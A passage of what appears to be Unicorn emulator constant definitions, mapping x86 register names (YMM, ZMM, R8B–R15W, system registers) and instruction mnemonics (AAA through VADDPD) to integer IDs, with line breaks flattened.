161 UC_X86_REG_YMM8 = 162 UC_X86_REG_YMM9 = 163 UC_X86_REG_YMM10 = 164 UC_X86_REG_YMM11 = 165 UC_X86_REG_YMM12 = 166 UC_X86_REG_YMM13 = 167 UC_X86_REG_YMM14 = 168 UC_X86_REG_YMM15 = 169 UC_X86_REG_YMM16 = 170 UC_X86_REG_YMM17 = 171 UC_X86_REG_YMM18 = 172 UC_X86_REG_YMM19 = 173 UC_X86_REG_YMM20 = 174 UC_X86_REG_YMM21 = 175 UC_X86_REG_YMM22 = 176 UC_X86_REG_YMM23 = 177 UC_X86_REG_YMM24 = 178 UC_X86_REG_YMM25 = 179 UC_X86_REG_YMM26 = 180 UC_X86_REG_YMM27 = 181 UC_X86_REG_YMM28 = 182 UC_X86_REG_YMM29 = 183 UC_X86_REG_YMM30 = 184 UC_X86_REG_YMM31 = 185 UC_X86_REG_ZMM0 = 186 UC_X86_REG_ZMM1 = 187 UC_X86_REG_ZMM2 = 188 UC_X86_REG_ZMM3 = 189 UC_X86_REG_ZMM4 = 190 UC_X86_REG_ZMM5 = 191 UC_X86_REG_ZMM6 = 192 UC_X86_REG_ZMM7 = 193 UC_X86_REG_ZMM8 = 194 UC_X86_REG_ZMM9 = 195 UC_X86_REG_ZMM10 = 196 UC_X86_REG_ZMM11 = 197 UC_X86_REG_ZMM12 = 198 UC_X86_REG_ZMM13 = 199 UC_X86_REG_ZMM14 = 200 UC_X86_REG_ZMM15 = 201 UC_X86_REG_ZMM16 = 202 UC_X86_REG_ZMM17 = 203 UC_X86_REG_ZMM18 = 204 UC_X86_REG_ZMM19 = 205 UC_X86_REG_ZMM20 = 206 UC_X86_REG_ZMM21 = 207 UC_X86_REG_ZMM22 = 208 UC_X86_REG_ZMM23 = 209 UC_X86_REG_ZMM24 = 210 UC_X86_REG_ZMM25 = 211 UC_X86_REG_ZMM26 = 212 UC_X86_REG_ZMM27 = 213 UC_X86_REG_ZMM28 = 214 UC_X86_REG_ZMM29 = 215 UC_X86_REG_ZMM30 = 216 UC_X86_REG_ZMM31 = 217 UC_X86_REG_R8B = 218 UC_X86_REG_R9B = 219 UC_X86_REG_R10B = 220 UC_X86_REG_R11B = 221 UC_X86_REG_R12B = 222 UC_X86_REG_R13B = 223 UC_X86_REG_R14B = 224 UC_X86_REG_R15B = 225 UC_X86_REG_R8D = 226 UC_X86_REG_R9D = 227 UC_X86_REG_R10D = 228 UC_X86_REG_R11D = 229 UC_X86_REG_R12D = 230 UC_X86_REG_R13D = 231 UC_X86_REG_R14D = 232 UC_X86_REG_R15D = 233 UC_X86_REG_R8W = 234 UC_X86_REG_R9W = 235 UC_X86_REG_R10W = 236 UC_X86_REG_R11W = 237 UC_X86_REG_R12W = 238 UC_X86_REG_R13W = 239 UC_X86_REG_R14W = 240 UC_X86_REG_R15W = 241 UC_X86_REG_IDTR = 242 UC_X86_REG_GDTR = 243 UC_X86_REG_LDTR = 244 UC_X86_REG_TR = 245 UC_X86_REG_FPCW = 246 UC_X86_REG_FPTAG = 247 UC_X86_REG_MSR = 248 UC_X86_REG_MXCSR = 249 UC_X86_REG_FS_BASE = 250 UC_X86_REG_GS_BASE = 251 UC_X86_REG_FLAGS = 252 UC_X86_REG_RFLAGS = 253 UC_X86_REG_FIP = 254 UC_X86_REG_FCS = 255 UC_X86_REG_FDP = 256 UC_X86_REG_FDS = 257 UC_X86_REG_FOP = 258 UC_X86_REG_ENDING = 259 # X86 instructions UC_X86_INS_INVALID = 0 UC_X86_INS_AAA = 1 UC_X86_INS_AAD = 2 UC_X86_INS_AAM = 3 UC_X86_INS_AAS = 4 UC_X86_INS_FABS = 5 UC_X86_INS_ADC = 6 UC_X86_INS_ADCX = 7 UC_X86_INS_ADD = 8 UC_X86_INS_ADDPD = 9 UC_X86_INS_ADDPS = 10 UC_X86_INS_ADDSD = 11 UC_X86_INS_ADDSS = 12 UC_X86_INS_ADDSUBPD = 13 UC_X86_INS_ADDSUBPS = 14 UC_X86_INS_FADD = 15 UC_X86_INS_FIADD = 16 UC_X86_INS_FADDP = 17 UC_X86_INS_ADOX = 18 UC_X86_INS_AESDECLAST = 19 UC_X86_INS_AESDEC = 20 UC_X86_INS_AESENCLAST = 21 UC_X86_INS_AESENC = 22 UC_X86_INS_AESIMC = 23 UC_X86_INS_AESKEYGENASSIST = 24 UC_X86_INS_AND = 25 UC_X86_INS_ANDN = 26 UC_X86_INS_ANDNPD = 27 UC_X86_INS_ANDNPS = 28 UC_X86_INS_ANDPD = 29 UC_X86_INS_ANDPS = 30 UC_X86_INS_ARPL = 31 UC_X86_INS_BEXTR = 32 UC_X86_INS_BLCFILL = 33 UC_X86_INS_BLCI = 34 UC_X86_INS_BLCIC = 35 UC_X86_INS_BLCMSK = 36 UC_X86_INS_BLCS = 37 UC_X86_INS_BLENDPD = 38 UC_X86_INS_BLENDPS = 39 UC_X86_INS_BLENDVPD = 40 UC_X86_INS_BLENDVPS = 41 UC_X86_INS_BLSFILL = 42 UC_X86_INS_BLSI = 43 UC_X86_INS_BLSIC = 44 UC_X86_INS_BLSMSK = 45 UC_X86_INS_BLSR = 46 UC_X86_INS_BOUND = 47 UC_X86_INS_BSF = 48 UC_X86_INS_BSR = 49 UC_X86_INS_BSWAP = 50 UC_X86_INS_BT = 51 UC_X86_INS_BTC = 52 UC_X86_INS_BTR = 53 UC_X86_INS_BTS = 54 UC_X86_INS_BZHI = 55 UC_X86_INS_CALL = 56 UC_X86_INS_CBW = 57 UC_X86_INS_CDQ = 58 UC_X86_INS_CDQE = 59 UC_X86_INS_FCHS = 60 UC_X86_INS_CLAC = 61 UC_X86_INS_CLC = 62 UC_X86_INS_CLD = 63 UC_X86_INS_CLFLUSH = 64 UC_X86_INS_CLFLUSHOPT = 65 UC_X86_INS_CLGI = 66 UC_X86_INS_CLI = 67 UC_X86_INS_CLTS = 68 UC_X86_INS_CLWB = 69 UC_X86_INS_CMC = 70 UC_X86_INS_CMOVA = 71 UC_X86_INS_CMOVAE = 72 UC_X86_INS_CMOVB = 73 UC_X86_INS_CMOVBE = 74 UC_X86_INS_FCMOVBE = 75 UC_X86_INS_FCMOVB = 76 UC_X86_INS_CMOVE = 77 UC_X86_INS_FCMOVE = 78 UC_X86_INS_CMOVG = 79 UC_X86_INS_CMOVGE = 80 UC_X86_INS_CMOVL = 81 UC_X86_INS_CMOVLE = 82 UC_X86_INS_FCMOVNBE = 83 UC_X86_INS_FCMOVNB = 84 UC_X86_INS_CMOVNE = 85 UC_X86_INS_FCMOVNE = 86 UC_X86_INS_CMOVNO = 87 UC_X86_INS_CMOVNP = 88 UC_X86_INS_FCMOVNU = 89 UC_X86_INS_CMOVNS = 90 UC_X86_INS_CMOVO = 91 UC_X86_INS_CMOVP = 92 UC_X86_INS_FCMOVU = 93 UC_X86_INS_CMOVS = 94 UC_X86_INS_CMP = 95 UC_X86_INS_CMPPD = 96 UC_X86_INS_CMPPS = 97 UC_X86_INS_CMPSB = 98 UC_X86_INS_CMPSD = 99 UC_X86_INS_CMPSQ = 100 UC_X86_INS_CMPSS = 101 UC_X86_INS_CMPSW = 102 UC_X86_INS_CMPXCHG16B = 103 UC_X86_INS_CMPXCHG = 104 UC_X86_INS_CMPXCHG8B = 105 UC_X86_INS_COMISD = 106 UC_X86_INS_COMISS = 107 UC_X86_INS_FCOMP = 108 UC_X86_INS_FCOMPI = 109 UC_X86_INS_FCOMI = 110 UC_X86_INS_FCOM = 111 UC_X86_INS_FCOS = 112 UC_X86_INS_CPUID = 113 UC_X86_INS_CQO = 114 UC_X86_INS_CRC32 = 115 UC_X86_INS_CVTDQ2PD = 116 UC_X86_INS_CVTDQ2PS = 117 UC_X86_INS_CVTPD2DQ = 118 UC_X86_INS_CVTPD2PS = 119 UC_X86_INS_CVTPS2DQ = 120 UC_X86_INS_CVTPS2PD = 121 UC_X86_INS_CVTSD2SI = 122 UC_X86_INS_CVTSD2SS = 123 UC_X86_INS_CVTSI2SD = 124 UC_X86_INS_CVTSI2SS = 125 UC_X86_INS_CVTSS2SD = 126 UC_X86_INS_CVTSS2SI = 127 UC_X86_INS_CVTTPD2DQ = 128 UC_X86_INS_CVTTPS2DQ = 129 UC_X86_INS_CVTTSD2SI = 130 UC_X86_INS_CVTTSS2SI = 131 UC_X86_INS_CWD = 132 UC_X86_INS_CWDE = 133 UC_X86_INS_DAA = 134 UC_X86_INS_DAS = 135 UC_X86_INS_DATA16 = 136 UC_X86_INS_DEC = 137 UC_X86_INS_DIV = 138 UC_X86_INS_DIVPD = 139 UC_X86_INS_DIVPS = 140 UC_X86_INS_FDIVR = 141 UC_X86_INS_FIDIVR = 142 UC_X86_INS_FDIVRP = 143 UC_X86_INS_DIVSD = 144 UC_X86_INS_DIVSS = 145 UC_X86_INS_FDIV = 146 UC_X86_INS_FIDIV = 147 UC_X86_INS_FDIVP = 148 UC_X86_INS_DPPD = 149 UC_X86_INS_DPPS = 150 UC_X86_INS_RET = 151 UC_X86_INS_ENCLS = 152 UC_X86_INS_ENCLU = 153 UC_X86_INS_ENTER = 154 UC_X86_INS_EXTRACTPS = 155 UC_X86_INS_EXTRQ = 156 UC_X86_INS_F2XM1 = 157 UC_X86_INS_LCALL = 158 UC_X86_INS_LJMP = 159 UC_X86_INS_FBLD = 160 UC_X86_INS_FBSTP = 161 UC_X86_INS_FCOMPP = 162 UC_X86_INS_FDECSTP = 163 UC_X86_INS_FEMMS = 164 UC_X86_INS_FFREE = 165 UC_X86_INS_FICOM = 166 UC_X86_INS_FICOMP = 167 UC_X86_INS_FINCSTP = 168 UC_X86_INS_FLDCW = 169 UC_X86_INS_FLDENV = 170 UC_X86_INS_FLDL2E = 171 UC_X86_INS_FLDL2T = 172 UC_X86_INS_FLDLG2 = 173 UC_X86_INS_FLDLN2 = 174 UC_X86_INS_FLDPI = 175 UC_X86_INS_FNCLEX = 176 UC_X86_INS_FNINIT = 177 UC_X86_INS_FNOP = 178 UC_X86_INS_FNSTCW = 179 UC_X86_INS_FNSTSW = 180 UC_X86_INS_FPATAN = 181 UC_X86_INS_FPREM = 182 UC_X86_INS_FPREM1 = 183 UC_X86_INS_FPTAN = 184 UC_X86_INS_FFREEP = 185 UC_X86_INS_FRNDINT = 186 UC_X86_INS_FRSTOR = 187 UC_X86_INS_FNSAVE = 188 UC_X86_INS_FSCALE = 189 UC_X86_INS_FSETPM = 190 UC_X86_INS_FSINCOS = 191 UC_X86_INS_FNSTENV = 192 UC_X86_INS_FXAM = 193 UC_X86_INS_FXRSTOR = 194 UC_X86_INS_FXRSTOR64 = 195 UC_X86_INS_FXSAVE = 196 UC_X86_INS_FXSAVE64 = 197 UC_X86_INS_FXTRACT = 198 UC_X86_INS_FYL2X = 199 UC_X86_INS_FYL2XP1 = 200 UC_X86_INS_MOVAPD = 201 UC_X86_INS_MOVAPS = 202 UC_X86_INS_ORPD = 203 UC_X86_INS_ORPS = 204 UC_X86_INS_VMOVAPD = 205 UC_X86_INS_VMOVAPS = 206 UC_X86_INS_XORPD = 207 UC_X86_INS_XORPS = 208 UC_X86_INS_GETSEC = 209 UC_X86_INS_HADDPD = 210 UC_X86_INS_HADDPS = 211 UC_X86_INS_HLT = 212 UC_X86_INS_HSUBPD = 213 UC_X86_INS_HSUBPS = 214 UC_X86_INS_IDIV = 215 UC_X86_INS_FILD = 216 UC_X86_INS_IMUL = 217 UC_X86_INS_IN = 218 UC_X86_INS_INC = 219 UC_X86_INS_INSB = 220 UC_X86_INS_INSERTPS = 221 UC_X86_INS_INSERTQ = 222 UC_X86_INS_INSD = 223 UC_X86_INS_INSW = 224 UC_X86_INS_INT = 225 UC_X86_INS_INT1 = 226 UC_X86_INS_INT3 = 227 UC_X86_INS_INTO = 228 UC_X86_INS_INVD = 229 UC_X86_INS_INVEPT = 230 UC_X86_INS_INVLPG = 231 UC_X86_INS_INVLPGA = 232 UC_X86_INS_INVPCID = 233 UC_X86_INS_INVVPID = 234 UC_X86_INS_IRET = 235 UC_X86_INS_IRETD = 236 UC_X86_INS_IRETQ = 237 UC_X86_INS_FISTTP = 238 UC_X86_INS_FIST = 239 UC_X86_INS_FISTP = 240 UC_X86_INS_UCOMISD = 241 UC_X86_INS_UCOMISS = 242 UC_X86_INS_VCOMISD = 243 UC_X86_INS_VCOMISS = 244 UC_X86_INS_VCVTSD2SS = 245 UC_X86_INS_VCVTSI2SD = 246 UC_X86_INS_VCVTSI2SS = 247 UC_X86_INS_VCVTSS2SD = 248 UC_X86_INS_VCVTTSD2SI = 249 UC_X86_INS_VCVTTSD2USI = 250 UC_X86_INS_VCVTTSS2SI = 251 UC_X86_INS_VCVTTSS2USI = 252 UC_X86_INS_VCVTUSI2SD = 253 UC_X86_INS_VCVTUSI2SS = 254 UC_X86_INS_VUCOMISD = 255 UC_X86_INS_VUCOMISS = 256 UC_X86_INS_JAE = 257 UC_X86_INS_JA = 258 UC_X86_INS_JBE = 259 UC_X86_INS_JB = 260 UC_X86_INS_JCXZ = 261 UC_X86_INS_JECXZ = 262 UC_X86_INS_JE = 263 UC_X86_INS_JGE = 264 UC_X86_INS_JG = 265 UC_X86_INS_JLE = 266 UC_X86_INS_JL = 267 UC_X86_INS_JMP = 268 UC_X86_INS_JNE = 269 UC_X86_INS_JNO = 270 UC_X86_INS_JNP = 271 UC_X86_INS_JNS = 272 UC_X86_INS_JO = 273 UC_X86_INS_JP = 274 UC_X86_INS_JRCXZ = 275 UC_X86_INS_JS = 276 UC_X86_INS_KANDB = 277 UC_X86_INS_KANDD = 278 UC_X86_INS_KANDNB = 279 UC_X86_INS_KANDND = 280 UC_X86_INS_KANDNQ = 281 UC_X86_INS_KANDNW = 282 UC_X86_INS_KANDQ = 283 UC_X86_INS_KANDW = 284 UC_X86_INS_KMOVB = 285 UC_X86_INS_KMOVD = 286 UC_X86_INS_KMOVQ = 287 UC_X86_INS_KMOVW = 288 UC_X86_INS_KNOTB = 289 UC_X86_INS_KNOTD = 290 UC_X86_INS_KNOTQ = 291 UC_X86_INS_KNOTW = 292 UC_X86_INS_KORB = 293 UC_X86_INS_KORD = 294 UC_X86_INS_KORQ = 295 UC_X86_INS_KORTESTB = 296 UC_X86_INS_KORTESTD = 297 UC_X86_INS_KORTESTQ = 298 UC_X86_INS_KORTESTW = 299 UC_X86_INS_KORW = 300 UC_X86_INS_KSHIFTLB = 301 UC_X86_INS_KSHIFTLD = 302 UC_X86_INS_KSHIFTLQ = 303 UC_X86_INS_KSHIFTLW = 304 UC_X86_INS_KSHIFTRB = 305 UC_X86_INS_KSHIFTRD = 306 UC_X86_INS_KSHIFTRQ = 307 UC_X86_INS_KSHIFTRW = 308 UC_X86_INS_KUNPCKBW = 309 UC_X86_INS_KXNORB = 310 UC_X86_INS_KXNORD = 311 UC_X86_INS_KXNORQ = 312 UC_X86_INS_KXNORW = 313 UC_X86_INS_KXORB = 314 UC_X86_INS_KXORD = 315 UC_X86_INS_KXORQ = 316 UC_X86_INS_KXORW = 317 UC_X86_INS_LAHF = 318 UC_X86_INS_LAR = 319 UC_X86_INS_LDDQU = 320 UC_X86_INS_LDMXCSR = 321 UC_X86_INS_LDS = 322 UC_X86_INS_FLDZ = 323 UC_X86_INS_FLD1 = 324 UC_X86_INS_FLD = 325 UC_X86_INS_LEA = 326 UC_X86_INS_LEAVE = 327 UC_X86_INS_LES = 328 UC_X86_INS_LFENCE = 329 UC_X86_INS_LFS = 330 UC_X86_INS_LGDT = 331 UC_X86_INS_LGS = 332 UC_X86_INS_LIDT = 333 UC_X86_INS_LLDT = 334 UC_X86_INS_LMSW = 335 UC_X86_INS_OR = 336 UC_X86_INS_SUB = 337 UC_X86_INS_XOR = 338 UC_X86_INS_LODSB = 339 UC_X86_INS_LODSD = 340 UC_X86_INS_LODSQ = 341 UC_X86_INS_LODSW = 342 UC_X86_INS_LOOP = 343 UC_X86_INS_LOOPE = 344 UC_X86_INS_LOOPNE = 345 UC_X86_INS_RETF = 346 UC_X86_INS_RETFQ = 347 UC_X86_INS_LSL = 348 UC_X86_INS_LSS = 349 UC_X86_INS_LTR = 350 UC_X86_INS_XADD = 351 UC_X86_INS_LZCNT = 352 UC_X86_INS_MASKMOVDQU = 353 UC_X86_INS_MAXPD = 354 UC_X86_INS_MAXPS = 355 UC_X86_INS_MAXSD = 356 UC_X86_INS_MAXSS = 357 UC_X86_INS_MFENCE = 358 UC_X86_INS_MINPD = 359 UC_X86_INS_MINPS = 360 UC_X86_INS_MINSD = 361 UC_X86_INS_MINSS = 362 UC_X86_INS_CVTPD2PI = 363 UC_X86_INS_CVTPI2PD = 364 UC_X86_INS_CVTPI2PS = 365 UC_X86_INS_CVTPS2PI = 366 UC_X86_INS_CVTTPD2PI = 367 UC_X86_INS_CVTTPS2PI = 368 UC_X86_INS_EMMS = 369 UC_X86_INS_MASKMOVQ = 370 UC_X86_INS_MOVD = 371 UC_X86_INS_MOVDQ2Q = 372 UC_X86_INS_MOVNTQ = 373 UC_X86_INS_MOVQ2DQ = 374 UC_X86_INS_MOVQ = 375 UC_X86_INS_PABSB = 376 UC_X86_INS_PABSD = 377 UC_X86_INS_PABSW = 378 UC_X86_INS_PACKSSDW = 379 UC_X86_INS_PACKSSWB = 380 UC_X86_INS_PACKUSWB = 381 UC_X86_INS_PADDB = 382 UC_X86_INS_PADDD = 383 UC_X86_INS_PADDQ = 384 UC_X86_INS_PADDSB = 385 UC_X86_INS_PADDSW = 386 UC_X86_INS_PADDUSB = 387 UC_X86_INS_PADDUSW = 388 UC_X86_INS_PADDW = 389 UC_X86_INS_PALIGNR = 390 UC_X86_INS_PANDN = 391 UC_X86_INS_PAND = 392 UC_X86_INS_PAVGB = 393 UC_X86_INS_PAVGW = 394 UC_X86_INS_PCMPEQB = 395 UC_X86_INS_PCMPEQD = 396 UC_X86_INS_PCMPEQW = 397 UC_X86_INS_PCMPGTB = 398 UC_X86_INS_PCMPGTD = 399 UC_X86_INS_PCMPGTW = 400 UC_X86_INS_PEXTRW = 401 UC_X86_INS_PHADDSW = 402 UC_X86_INS_PHADDW = 403 UC_X86_INS_PHADDD = 404 UC_X86_INS_PHSUBD = 405 UC_X86_INS_PHSUBSW = 406 UC_X86_INS_PHSUBW = 407 UC_X86_INS_PINSRW = 408 UC_X86_INS_PMADDUBSW = 409 UC_X86_INS_PMADDWD = 410 UC_X86_INS_PMAXSW = 411 UC_X86_INS_PMAXUB = 412 UC_X86_INS_PMINSW = 413 UC_X86_INS_PMINUB = 414 UC_X86_INS_PMOVMSKB = 415 UC_X86_INS_PMULHRSW = 416 UC_X86_INS_PMULHUW = 417 UC_X86_INS_PMULHW = 418 UC_X86_INS_PMULLW = 419 UC_X86_INS_PMULUDQ = 420 UC_X86_INS_POR = 421 UC_X86_INS_PSADBW = 422 UC_X86_INS_PSHUFB = 423 UC_X86_INS_PSHUFW = 424 UC_X86_INS_PSIGNB = 425 UC_X86_INS_PSIGND = 426 UC_X86_INS_PSIGNW = 427 UC_X86_INS_PSLLD = 428 UC_X86_INS_PSLLQ = 429 UC_X86_INS_PSLLW = 430 UC_X86_INS_PSRAD = 431 UC_X86_INS_PSRAW = 432 UC_X86_INS_PSRLD = 433 UC_X86_INS_PSRLQ = 434 UC_X86_INS_PSRLW = 435 UC_X86_INS_PSUBB = 436 UC_X86_INS_PSUBD = 437 UC_X86_INS_PSUBQ = 438 UC_X86_INS_PSUBSB = 439 UC_X86_INS_PSUBSW = 440 UC_X86_INS_PSUBUSB = 441 UC_X86_INS_PSUBUSW = 442 UC_X86_INS_PSUBW = 443 UC_X86_INS_PUNPCKHBW = 444 UC_X86_INS_PUNPCKHDQ = 445 UC_X86_INS_PUNPCKHWD = 446 UC_X86_INS_PUNPCKLBW = 447 UC_X86_INS_PUNPCKLDQ = 448 UC_X86_INS_PUNPCKLWD = 449 UC_X86_INS_PXOR = 450 UC_X86_INS_MONITOR = 451 UC_X86_INS_MONTMUL = 452 UC_X86_INS_MOV = 453 UC_X86_INS_MOVABS = 454 UC_X86_INS_MOVBE = 455 UC_X86_INS_MOVDDUP = 456 UC_X86_INS_MOVDQA = 457 UC_X86_INS_MOVDQU = 458 UC_X86_INS_MOVHLPS = 459 UC_X86_INS_MOVHPD = 460 UC_X86_INS_MOVHPS = 461 UC_X86_INS_MOVLHPS = 462 UC_X86_INS_MOVLPD = 463 UC_X86_INS_MOVLPS = 464 UC_X86_INS_MOVMSKPD = 465 UC_X86_INS_MOVMSKPS = 466 UC_X86_INS_MOVNTDQA = 467 UC_X86_INS_MOVNTDQ = 468 UC_X86_INS_MOVNTI = 469 UC_X86_INS_MOVNTPD = 470 UC_X86_INS_MOVNTPS = 471 UC_X86_INS_MOVNTSD = 472 UC_X86_INS_MOVNTSS = 473 UC_X86_INS_MOVSB = 474 UC_X86_INS_MOVSD = 475 UC_X86_INS_MOVSHDUP = 476 UC_X86_INS_MOVSLDUP = 477 UC_X86_INS_MOVSQ = 478 UC_X86_INS_MOVSS = 479 UC_X86_INS_MOVSW = 480 UC_X86_INS_MOVSX = 481 UC_X86_INS_MOVSXD = 482 UC_X86_INS_MOVUPD = 483 UC_X86_INS_MOVUPS = 484 UC_X86_INS_MOVZX = 485 UC_X86_INS_MPSADBW = 486 UC_X86_INS_MUL = 487 UC_X86_INS_MULPD = 488 UC_X86_INS_MULPS = 489 UC_X86_INS_MULSD = 490 UC_X86_INS_MULSS = 491 UC_X86_INS_MULX = 492 UC_X86_INS_FMUL = 493 UC_X86_INS_FIMUL = 494 UC_X86_INS_FMULP = 495 UC_X86_INS_MWAIT = 496 UC_X86_INS_NEG = 497 UC_X86_INS_NOP = 498 UC_X86_INS_NOT = 499 UC_X86_INS_OUT = 500 UC_X86_INS_OUTSB = 501 UC_X86_INS_OUTSD = 502 UC_X86_INS_OUTSW = 503 UC_X86_INS_PACKUSDW = 504 UC_X86_INS_PAUSE = 505 UC_X86_INS_PAVGUSB = 506 UC_X86_INS_PBLENDVB = 507 UC_X86_INS_PBLENDW = 508 UC_X86_INS_PCLMULQDQ = 509 UC_X86_INS_PCMPEQQ = 510 UC_X86_INS_PCMPESTRI = 511 UC_X86_INS_PCMPESTRM = 512 UC_X86_INS_PCMPGTQ = 513 UC_X86_INS_PCMPISTRI = 514 UC_X86_INS_PCMPISTRM = 515 UC_X86_INS_PCOMMIT = 516 UC_X86_INS_PDEP = 517 UC_X86_INS_PEXT = 518 UC_X86_INS_PEXTRB = 519 UC_X86_INS_PEXTRD = 520 UC_X86_INS_PEXTRQ = 521 UC_X86_INS_PF2ID = 522 UC_X86_INS_PF2IW = 523 UC_X86_INS_PFACC = 524 UC_X86_INS_PFADD = 525 UC_X86_INS_PFCMPEQ = 526 UC_X86_INS_PFCMPGE = 527 UC_X86_INS_PFCMPGT = 528 UC_X86_INS_PFMAX = 529 UC_X86_INS_PFMIN = 530 UC_X86_INS_PFMUL = 531 UC_X86_INS_PFNACC = 532 UC_X86_INS_PFPNACC = 533 UC_X86_INS_PFRCPIT1 = 534 UC_X86_INS_PFRCPIT2 = 535 UC_X86_INS_PFRCP = 536 UC_X86_INS_PFRSQIT1 = 537 UC_X86_INS_PFRSQRT = 538 UC_X86_INS_PFSUBR = 539 UC_X86_INS_PFSUB = 540 UC_X86_INS_PHMINPOSUW = 541 UC_X86_INS_PI2FD = 542 UC_X86_INS_PI2FW = 543 UC_X86_INS_PINSRB = 544 UC_X86_INS_PINSRD = 545 UC_X86_INS_PINSRQ = 546 UC_X86_INS_PMAXSB = 547 UC_X86_INS_PMAXSD = 548 UC_X86_INS_PMAXUD = 549 UC_X86_INS_PMAXUW = 550 UC_X86_INS_PMINSB = 551 UC_X86_INS_PMINSD = 552 UC_X86_INS_PMINUD = 553 UC_X86_INS_PMINUW = 554 UC_X86_INS_PMOVSXBD = 555 UC_X86_INS_PMOVSXBQ = 556 UC_X86_INS_PMOVSXBW = 557 UC_X86_INS_PMOVSXDQ = 558 UC_X86_INS_PMOVSXWD = 559 UC_X86_INS_PMOVSXWQ = 560 UC_X86_INS_PMOVZXBD = 561 UC_X86_INS_PMOVZXBQ = 562 UC_X86_INS_PMOVZXBW = 563 UC_X86_INS_PMOVZXDQ = 564 UC_X86_INS_PMOVZXWD = 565 UC_X86_INS_PMOVZXWQ = 566 UC_X86_INS_PMULDQ = 567 UC_X86_INS_PMULHRW = 568 UC_X86_INS_PMULLD = 569 UC_X86_INS_POP = 570 UC_X86_INS_POPAW = 571 UC_X86_INS_POPAL = 572 UC_X86_INS_POPCNT = 573 UC_X86_INS_POPF = 574 UC_X86_INS_POPFD = 575 UC_X86_INS_POPFQ = 576 UC_X86_INS_PREFETCH = 577 UC_X86_INS_PREFETCHNTA = 578 UC_X86_INS_PREFETCHT0 = 579 UC_X86_INS_PREFETCHT1 = 580 UC_X86_INS_PREFETCHT2 = 581 UC_X86_INS_PREFETCHW = 582 UC_X86_INS_PSHUFD = 583 UC_X86_INS_PSHUFHW = 584 UC_X86_INS_PSHUFLW = 585 UC_X86_INS_PSLLDQ = 586 UC_X86_INS_PSRLDQ = 587 UC_X86_INS_PSWAPD = 588 UC_X86_INS_PTEST = 589 UC_X86_INS_PUNPCKHQDQ = 590 UC_X86_INS_PUNPCKLQDQ = 591 UC_X86_INS_PUSH = 592 UC_X86_INS_PUSHAW = 593 UC_X86_INS_PUSHAL = 594 UC_X86_INS_PUSHF = 595 UC_X86_INS_PUSHFD = 596 UC_X86_INS_PUSHFQ = 597 UC_X86_INS_RCL = 598 UC_X86_INS_RCPPS = 599 UC_X86_INS_RCPSS = 600 UC_X86_INS_RCR = 601 UC_X86_INS_RDFSBASE = 602 UC_X86_INS_RDGSBASE = 603 UC_X86_INS_RDMSR = 604 UC_X86_INS_RDPMC = 605 UC_X86_INS_RDRAND = 606 UC_X86_INS_RDSEED = 607 UC_X86_INS_RDTSC = 608 UC_X86_INS_RDTSCP = 609 UC_X86_INS_ROL = 610 UC_X86_INS_ROR = 611 UC_X86_INS_RORX = 612 UC_X86_INS_ROUNDPD = 613 UC_X86_INS_ROUNDPS = 614 UC_X86_INS_ROUNDSD = 615 UC_X86_INS_ROUNDSS = 616 UC_X86_INS_RSM = 617 UC_X86_INS_RSQRTPS = 618 UC_X86_INS_RSQRTSS = 619 UC_X86_INS_SAHF = 620 UC_X86_INS_SAL = 621 UC_X86_INS_SALC = 622 UC_X86_INS_SAR = 623 UC_X86_INS_SARX = 624 UC_X86_INS_SBB = 625 UC_X86_INS_SCASB = 626 UC_X86_INS_SCASD = 627 UC_X86_INS_SCASQ = 628 UC_X86_INS_SCASW = 629 UC_X86_INS_SETAE = 630 UC_X86_INS_SETA = 631 UC_X86_INS_SETBE = 632 UC_X86_INS_SETB = 633 UC_X86_INS_SETE = 634 UC_X86_INS_SETGE = 635 UC_X86_INS_SETG = 636 UC_X86_INS_SETLE = 637 UC_X86_INS_SETL = 638 UC_X86_INS_SETNE = 639 UC_X86_INS_SETNO = 640 UC_X86_INS_SETNP = 641 UC_X86_INS_SETNS = 642 UC_X86_INS_SETO = 643 UC_X86_INS_SETP = 644 UC_X86_INS_SETS = 645 UC_X86_INS_SFENCE = 646 UC_X86_INS_SGDT = 647 UC_X86_INS_SHA1MSG1 = 648 UC_X86_INS_SHA1MSG2 = 649 UC_X86_INS_SHA1NEXTE = 650 UC_X86_INS_SHA1RNDS4 = 651 UC_X86_INS_SHA256MSG1 = 652 UC_X86_INS_SHA256MSG2 = 653 UC_X86_INS_SHA256RNDS2 = 654 UC_X86_INS_SHL = 655 UC_X86_INS_SHLD = 656 UC_X86_INS_SHLX = 657 UC_X86_INS_SHR = 658 UC_X86_INS_SHRD = 659 UC_X86_INS_SHRX = 660 UC_X86_INS_SHUFPD = 661 UC_X86_INS_SHUFPS = 662 UC_X86_INS_SIDT = 663 UC_X86_INS_FSIN = 664 UC_X86_INS_SKINIT = 665 UC_X86_INS_SLDT = 666 UC_X86_INS_SMSW = 667 UC_X86_INS_SQRTPD = 668 UC_X86_INS_SQRTPS = 669 UC_X86_INS_SQRTSD = 670 UC_X86_INS_SQRTSS = 671 UC_X86_INS_FSQRT = 672 UC_X86_INS_STAC = 673 UC_X86_INS_STC = 674 UC_X86_INS_STD = 675 UC_X86_INS_STGI = 676 UC_X86_INS_STI = 677 UC_X86_INS_STMXCSR = 678 UC_X86_INS_STOSB = 679 UC_X86_INS_STOSD = 680 UC_X86_INS_STOSQ = 681 UC_X86_INS_STOSW = 682 UC_X86_INS_STR = 683 UC_X86_INS_FST = 684 UC_X86_INS_FSTP = 685 UC_X86_INS_FSTPNCE = 686 UC_X86_INS_FXCH = 687 UC_X86_INS_SUBPD = 688 UC_X86_INS_SUBPS = 689 UC_X86_INS_FSUBR = 690 UC_X86_INS_FISUBR = 691 UC_X86_INS_FSUBRP = 692 UC_X86_INS_SUBSD = 693 UC_X86_INS_SUBSS = 694 UC_X86_INS_FSUB = 695 UC_X86_INS_FISUB = 696 UC_X86_INS_FSUBP = 697 UC_X86_INS_SWAPGS = 698 UC_X86_INS_SYSCALL = 699 UC_X86_INS_SYSENTER = 700 UC_X86_INS_SYSEXIT = 701 UC_X86_INS_SYSRET = 702 UC_X86_INS_T1MSKC = 703 UC_X86_INS_TEST = 704 UC_X86_INS_UD2 = 705 UC_X86_INS_FTST = 706 UC_X86_INS_TZCNT = 707 UC_X86_INS_TZMSK = 708 UC_X86_INS_FUCOMPI = 709 UC_X86_INS_FUCOMI = 710 UC_X86_INS_FUCOMPP = 711 UC_X86_INS_FUCOMP = 712 UC_X86_INS_FUCOM = 713 UC_X86_INS_UD2B = 714 UC_X86_INS_UNPCKHPD = 715 UC_X86_INS_UNPCKHPS = 716 UC_X86_INS_UNPCKLPD = 717 UC_X86_INS_UNPCKLPS = 718 UC_X86_INS_VADDPD = 719 